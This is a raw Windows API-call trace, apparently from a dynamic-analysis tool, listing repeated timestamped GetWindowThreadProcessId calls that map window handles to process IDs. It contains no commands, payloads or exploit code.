	[0630.793] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.793] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.793] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.793] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.793] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.793] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.794] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.794] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x818
	[0630.794] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x5b8
	[0630.794] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x494
	[0630.794] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1ec
	[0630.794] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x440
	[0630.794] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x7e8
	[0630.794] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x730
	[0630.794] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x2c8
	[0630.795] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x31c
	[0630.795] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x330
	[0630.795] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x128
	[0630.795] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x5c8
	[0630.795] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x6f8
	[0630.795] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x358
	[0630.795] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x73c
	[0630.795] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb0
	[0630.796] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x250
	[0630.796] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x240
	[0630.796] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x790
	[0630.796] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x61c
	[0630.796] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x540
	[0630.796] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x538
	[0630.796] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x568
	[0630.796] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x538
	[0630.796] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x568
	[0630.797] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x538
	[0630.797] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x540
	[0630.797] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x540
	[0630.797] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x57c
	[0630.797] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x460
	[0630.797] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x554
	[0630.797] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.797] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x528
	[0630.798] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.798] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.798] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.798] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x79c
	[0630.798] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.798] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4e0
	[0630.798] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.798] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x460
	[0630.798] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x460
	[0630.799] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x44c
	[0630.799] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x778
	[0630.799] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x460
	[0630.799] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x558
	[0630.799] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.799] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4d0
	[0630.799] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1bb4
	[0630.799] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10bc
	[0630.800] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1b50
	[0630.800] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x14b4
	[0630.800] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x149c
	[0630.800] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x14a8
	[0630.800] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1490
	[0630.800] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x14a4
	[0630.800] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x148c
	[0630.800] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1458
	[0630.800] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1b4c
	[0630.803] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1b3c
	[0630.804] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x19bc
	[0630.804] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x199c
	[0630.804] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1998
	[0630.804] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1994
	[0630.804] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1990
	[0630.804] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1984
	[0630.804] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x197c
	[0630.804] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1978
	[0635.519] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1824
	[0637.892] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1088
	[0640.431] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1908
	[0646.030] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x18cc
	[0648.244] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x18d0
	[0650.291] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1840
	[0650.294] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10c4
	[0652.193] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x128c
	[0652.195] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x16e8
	[0652.196] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x16cc
	[0654.237] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x274
	[0656.062] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10e0
	[0657.528] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10cc
	[0658.044] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10c0
	[0658.046] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x10d0
	[0659.671] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1198
	[0661.603] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1080
	[0662.569] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1074
	[0662.570] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x106c
	[0666.420] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1474
	[0666.426] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1414
	[0668.218] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xbd0
	[0668.715] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x550
	[0668.717] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa38
	[0668.718] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x16d0
	[0670.570] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x16d4
	[0670.572] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x15bc
	[0670.573] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x15a0
	[0672.806] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x159c
	[0672.808] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1598
	[0674.300] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1594
	[0676.340] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1590
	[0676.340] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x158c
	[0680.085] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1588
	[0683.774] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1584
	[0683.774] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1580
	[0683.775] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x157c
	[0683.775] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1488
	[0683.775] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1404
	[0683.775] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x11b8
	[0683.775] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xbd4
	[0683.775] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe0c
	[0683.791] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xd30
	[0683.792] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe70
	[0683.795] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x13b8
	[0683.795] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe20
	[0683.798] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe2c
	[0683.798] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe00
	[0683.798] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe04
	[0683.799] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc94
	[0683.799] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x13b0
	[0683.799] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x13ac
	[0683.799] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x13a8
	[0683.799] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1374
	[0683.799] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x132c
	[0683.799] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1328
	[0683.800] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x12d0
	[0683.800] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x12cc
	[0683.800] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x12c8
	[0683.800] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1290
	[0683.800] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1218
	[0683.800] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1214
	[0683.800] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x11ec
	[0683.800] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x11e8
	[0683.801] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x11cc
	[0683.801] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1140
	[0683.801] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe6c
	[0683.801] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x6e8
	[0683.801] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc6c
	[0683.801] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf94
	[0683.801] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xffc
	[0683.801] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf74
	[0683.802] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf08
	[0683.802] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf0c
	[0683.802] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xed8
	[0683.802] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xe90
	[0683.802] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xea8
	[0683.802] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xfa8
	[0683.802] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xfbc
	[0683.802] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xfb8
	[0683.803] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xfb4
	[0683.803] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xfb0
	[0683.803] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xfac
	[0683.803] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xfc0
	[0683.803] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xfd0
	[0683.803] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf88
	[0683.803] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf84
	[0683.803] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xf80
	[0683.804] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xde0
	[0683.804] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xddc
	[0683.804] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xdd8
	[0683.804] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xd34
	[0683.804] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xd10
	[0683.804] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xd0c
	[0683.804] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc9c
	[0683.804] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc74
	[0683.805] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc1c
	[0683.805] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xc08
	[0683.805] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xabc
	[0683.805] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x24c
	[0683.805] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xbb0
	[0683.805] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xbfc
	[0683.805] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb10
	[0683.805] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x374
	[0683.806] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x368
	[0683.806] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb28
	[0683.806] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xae8
	[0683.806] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb14
	[0683.806] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x95c
	[0683.806] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa8c
	[0683.806] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x46c
	[0683.806] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb3c
	[0683.807] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa90
	[0683.807] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xad0
	[0683.807] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa9c
	[0683.807] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xaa0
	[0683.807] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb1c
	[0683.807] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x7e0
	[0683.807] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa74
	[0683.807] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x694
	[0683.808] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xa28
	[0683.808] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x9b0
